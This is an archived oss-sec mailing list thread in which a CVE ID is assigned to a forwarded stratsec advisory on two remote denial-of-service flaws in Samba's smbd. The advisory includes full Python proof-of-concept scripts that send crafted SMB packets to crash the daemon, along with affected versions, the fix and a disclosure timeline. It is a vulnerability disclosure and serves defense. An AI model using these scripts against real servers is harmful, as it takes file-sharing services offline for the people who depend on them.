oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities

From: Josh Bressers <bressers () redhat com>
Date: Tue, 25 May 2010 13:53:46 -0400 (EDT)
Please use CVE-2010-1635

Sorry for the delay, I've been out for a few days.

-- 
    JB


----- "Thomas Biege" <thomas () novell com> wrote:


So far no assignments were made, right?

Am Donnerstag 20 Mai 2010 16:17:48 schrieb Thomas Biege:

Hello oss-security,
was a CVE-ID assigned for this issue already?

Thanks,
Thomas


----------  Forwarded Message  ----------

Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005:

Samba

Multiple DoS Vulnerabilities
Date: Mittwoch 12 Mai 2010, 09:00:07
From: stratsec Advisories <advisories () stratsec net>
An:  "full-disclosure () lists grok org uk"
<full-disclosure () lists grok org uk>



===========================================================================

==== stratsec Security Advisory: SS-2010-005


===========================================================================

====

Title:           Samba Multiple DoS Vulnerabilities
Version:         1.0
Issue type:      Multiple
Affected vendor: Samba
Release date:    12/05/2010
Discovered by:   Laurent Gaffié
Issue status:    Patch available



===========================================================================

====

Summary
-------

Two vulnerabilities were discovered within in the Samba Smbd daemon

which

allow
an attacker to trigger a null pointer dereference or an

uninitialized

variable read by sending a specific 'Sessions Setup AndX' query.
Successful exploitation
of these issues will result in a denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common

Internet File

System (CIFS) acts as an application-layer protocol to provide

shared

access to
files, printers and Inter-Process Communication (IPC). It is also a
transport for Distributed Computing Environment / Remote Procedure

Call

(DCE / RPC) operations. After negotiating an SMB communication the

client

sends a 'Session Setup AndX' packet to negotiate a session in order

to be

able to connect on a specific share.

To trigger the null pointer dereference, the client needs to send a

crafted

SMB
'Negotiate Protocol' query with the SMB header 'Flags2' set to

'0x0003'

(no Unicode), followed by a Session Setup AndX request with the SMB

header

'Flags2' set to '0x8003' (Unicode). This sequence will result in a

crash

within
the Smbd process.

The uninitialised Variable Read issue, can be triggered if the

client sends

a crafted 'Session Setup AndX' with a 'security blob length' value

set to

'\xff\xff'.

Impact
------

A remote attacker can cause a denial of service within the Samba

daemon


Affected products
-----------------

Samba <=3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following

Python

proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
 sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))


To trigger the null pointer dereference issue this Python proof of
concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
 sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution
--------

Update to version 3.5.2 or 3.4.8 (http://samba.org/)

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours

after

               receiving the initial email
* 09/03/2010 - Vendor confirms issue presence, and provide a patch

3

               hours after receiving the initial email.
* 09/03/2010 - stratsec confirms patch resolves issue.
* 15/03/2010 - Uninitialised Variable Read issue reported to

vendor.

* 15/03/2010 - Vendor confirms the issue and provides a patch 5

hours

               after receiving the initial email.
* 15/03/2010 - stratsec confirms patch resolves issue
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both

issues.

* 11/05/2010 - Version 3.4.8 released by the vendor fixing both

issues.

* 12/05/2010 - This advisory published.

References
----------
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thanks the Samba Security Team for their
  responsiveness while handling theses issues



===========================================================================

====

About stratsec
--------------
stratsec, specialises in providing information security consulting

and

testing services for government and commercial clients. Established

in

2004, we are now one of the leading independent information

security

companies in the Australasian and SE-Asian region, with offices

throughout

Australia and in Singapore and Malaysia.

For more information, please visit our website at

http://www.stratsec.net/




===========================================================================

====


-- 
 Thomas Biege <thomas () novell com>, SUSE LINUX, Security Support &
Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
Previous By Date Next
Previous By Thread Next

Current thread: